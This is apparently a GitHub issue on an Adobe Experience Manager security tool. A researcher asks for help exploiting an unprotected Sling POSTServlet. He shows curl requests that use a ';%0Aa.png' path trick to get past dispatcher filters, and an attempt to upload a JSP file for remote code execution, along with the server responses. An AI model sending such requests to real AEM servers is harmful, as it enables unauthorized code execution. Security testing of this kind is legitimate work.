Created by: mgbelisle
Hi @0ang3el thanks for making this tool, it's easy to use and the code looks very clean. I'm a security researcher, new to AEM, and I'm trying to figure out how to exploit an unprotected POSTServlet endpoint.
$ curl -F ':operation=nop' 'https://somedomain.com/content/dam.json;%0Aa.png'
...
<td><div id="Message">Null Operation Status: 200</div></td>
...
Can you explain a few more details about how that would be exploitable? I understand the RCE steps just fine but I'm having trouble with doing an actual upload. I have been reading over the sling docs here and trying several different paths but cannot get a 200 on anything other than a nop
.
$ curl -Fhtml.jsp=@/tmp/html.jsp 'https://somedomain.com/content/dam/rcetype;%0Aa.png'
...
<td><div id="Status">500</div></td>
...
<td><div id="Message">org.apache.sling.api.SlingException: Exception during response processing.</div></td>
...
Any extra info is appreciated, and I can add some more details to the docs in the spirit of contribution.